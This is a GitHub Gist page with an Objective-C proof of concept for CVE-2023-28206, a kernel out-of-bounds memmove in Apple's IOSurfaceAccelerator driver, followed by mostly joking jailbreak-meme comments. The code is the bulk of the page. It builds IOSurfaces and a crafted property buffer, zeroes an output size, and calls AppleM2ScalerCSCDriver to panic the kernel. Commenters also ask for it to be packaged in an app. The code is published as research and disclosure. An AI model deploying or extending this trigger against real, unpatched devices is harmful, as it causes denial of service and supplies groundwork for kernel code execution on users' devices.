Skip to content

Instantly share code, notes, and snippets.

@LinusHenze

LinusHenze/PoC.m Secret

Last active June 6, 2023 11:38
Embed
What would you like to do?
A PoC for CVE-2023-28206
//
// PoC.m
// IOSABugTrigger
//
// Created by Linus Henze on 2023-04-08.
// Copyright © 2023 Pinauten GmbH. Some rights reserved.
//
//
// This is a PoC for CVE-2023-28206, triggering an oob memmove in IosaColorManagerMSR8::getHDRStats_gatedContext
//
// License: MIT
//
#import <CoreFoundation/CoreFoundation.h>
#import <Foundation/Foundation.h>
#import <IOSurface/IOSurfaceTypes.h>
#import <IOSurface/IOSurfaceRef.h>
#import <IOKit/IOKitLib.h>
#import <stdio.h>
#import <assert.h>
#import <stdint.h>
#import <dlfcn.h>
struct CommApiData {
uint32_t inType;
void *inBuf;
uint32_t inBufSize;
uint32_t outType;
void *outBuf;
uint32_t outSize;
};
uint64_t (*prepareTransformBuffersAndOptions)(IOSurfaceRef a, IOSurfaceRef b, CFDictionaryRef dict, bool unk, void *buf);
// This function triggers an oob memmove in IosaColorManagerMSR8::getHDRStats_gatedContext
kern_return_t trigger_memmove_oob_copy(void) {
void *iosaHndl = dlopen("/System/Library/PrivateFrameworks/IOSurfaceAccelerator.framework/IOSurfaceAccelerator", RTLD_NOW);
prepareTransformBuffersAndOptions = dlsym(iosaHndl, "prepareTransformBuffersAndOptions");
NSDictionary *dict = @{
(__bridge NSString*) kIOSurfaceWidth: @1024,
(__bridge NSString*) kIOSurfaceHeight: @1024,
(__bridge NSString*) kIOSurfaceBytesPerElement: @4,
(__bridge NSString*) kIOSurfaceBytesPerRow: @(1024 * 4),
(__bridge NSString*) kIOSurfaceAllocSize: @(1024 * 1024 * 4),
(__bridge NSString*) kIOSurfacePixelFormat: @((uint32_t) 'RGBA'),
@"HDREnable": @YES,
// This is required for some reason
@"HistogramPixelBins": @[
@UINT32_MAX,
@UINT32_MAX,
@UINT32_MAX,
@UINT32_MAX,
@UINT32_MAX
]
};
IOSurfaceRef srcSurf = IOSurfaceCreate((__bridge CFDictionaryRef) dict);
memset(IOSurfaceGetBaseAddress(srcSurf), 0xF0, 1024 * 1024 * 4);
IOSurfaceRef destSurf = IOSurfaceCreate((__bridge CFDictionaryRef) dict);
void *dataBuf = malloc(0x170);
memset(dataBuf, 0, 0x170);
uint64_t rr = prepareTransformBuffersAndOptions(srcSurf, destSurf, (__bridge CFDictionaryRef) dict, 0, dataBuf);
assert(!rr);
struct CommApiData *apiDat = (struct CommApiData*) ((uintptr_t) dataBuf + 0xD0);
// Tell the kernel we want to do some HDR stuff
int i = 0;
uint32_t *pwnData = malloc(0x4000 * 4); // Need to allocate enough space because otherwise...
pwnData[i++] = 2; // Number of properties
pwnData[i++] = 100; // Size of properties
pwnData[i++] = 'base'; // Tag
pwnData[i++] = 4; // Size of data for this tag
pwnData[i++] = 0; // Value
pwnData[i++] = 'basf'; // Tag
pwnData[i++] = 4; // Size of data for this tag
pwnData[i++] = 0; // Value
// THIS IS THE REAL TRIGGER
apiDat[0].inType = 3;
apiDat[0].inBuf = pwnData;
apiDat[0].inBufSize = 0x4000 * 4;
apiDat[0].outType = 2;
apiDat[0].outBuf = malloc(0x4000);
apiDat[0].outSize = 0x1008; // Tell the kernel that we have 0x1008 bytes of space (this is the minimum)...
apiDat[2].inType = 3;
apiDat[2].inBuf = pwnData;
apiDat[2].inBufSize = 0x4000 * 4;
apiDat[2].outType = 2;
apiDat[2].outBuf = malloc(0x4000);
apiDat[2].outSize = 0; // ...and then replace the buffer with one of size zero!
io_service_t service = IOServiceGetMatchingService(kIOMainPortDefault, IOServiceMatching("AppleM2ScalerCSCDriver"));
assert(service);
io_connect_t conn = 0;
kern_return_t kr = IOServiceOpen(service, mach_task_self_, 0, &conn);
assert(kr == KERN_SUCCESS);
assert(conn);
IOObjectRelease(service);
kr = IOConnectCallStructMethod(conn, 1, dataBuf, 0x170, NULL, NULL);
// Kernel should have paniced at this point
assert(false);
return kr;
}
@JanCraft
Copy link

yo??? ios 16 jb eta s0n????

stfu

@WindowsNTXP
Copy link

stfu

@llsc12
Copy link

llsc12 commented Apr 10, 2023

yo??? ios 16 jb eta s0n????

stfu

@vmhl87
Copy link

vmhl87 commented Apr 10, 2023

yo??? ios 16 jb eta s0n????

stfu

@DownBeatGnu7882
Copy link

yo??? ios 16 jb eta s0n????

stfu

@1255691733
Copy link

🐂🍺

@HellGateAI
Copy link

stfu 🤭

yo??? ios 16 jb eta s0n????

stfu 🤭

@GeoSn0w
Copy link

GeoSn0w commented Apr 10, 2023

yo??? ios 16 jb eta s0n????

stfu

@katyapms1
Copy link

yo??? ios 16 jb eta s0n????

stfu

@qx-775
Copy link

qx-775 commented Apr 10, 2023

yo??? ios 16 jb eta s0n????

stfu

@Tracker-Friendly
Copy link

stfu

@strawbberrys
Copy link

Work on IPhone 14 Pro Max Plus IOS 16.4.1 India?

@adelmehenni
Copy link

yo??? ios 16 jb eta s0n????

stfu

@WazeHell
Copy link

yo??? ios 16 jb eta s0n????

stfu

@SushiDesigner
Copy link

yo??? ios 16 jb eta s0n????

stfu

❤️
@pizzaboxer

@strawbberrys
Copy link

Work on IPhone 14 Pro Max Plus IOS 16.4.1 India?

No, up to 16.4

16.4.1 India

@HirokazMogi
Copy link

ド素人ですが、このコードはどうやってデバイスに書き込むのですか?

@circularsprojects
Copy link

😭😭

@iarchiveml
Copy link

Work on IPhone 14 Pro Max Plus IOS 16.4.1 India?

stfu

@PeanutStick
Copy link

I love this community.

@dualra1n
Copy link

amazing exploit with just 116 lines of code. so cool. thank you for realase

@PARKasd
Copy link

PARKasd commented Apr 15, 2023

I love this community.

Except Dev, We all love this community

@Diowboss
Copy link

yo??? ios 16 jb eta s0n????

Stfu

@KevinAlavik
Copy link

Make an app with this now

@PARKasd
Copy link

PARKasd commented Apr 22, 2023

Make an app with this now

In fact there is. But It only makes kernel panic

@KevinAlavik
Copy link

@PARKasd yeah thats what i want, but wheere is this app i have seen twitter posts about it but havent seen nay release, i might make one

@PARKasd
Copy link

PARKasd commented Apr 29, 2023

@KevinAlavik You can use my loc change app too. It has reboot option with this PoC

@KevinAlavik
Copy link

@KevinAlavik You can use my loc change app too. It has reboot option with this PoC

Alr

@Tracker-Friendly
Copy link

is there any writeup about the bug?? How in the hell this bug is being triggered by only assigning apiDat[2] to zero since 0x1008 being minimum?

An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in macOS Monterey 12.6.5, iOS 16.4.1 and iPadOS 16.4.1, iOS 15.7.5 and iPadOS 15.7.5, macOS Big Sur 11.7.6, macOS Ventura 13.3.1. An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28206

Check the damn CVE 🤣

@itsnebulalol
Copy link

yo??? ios 16 jb eta s0n????

stfu

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment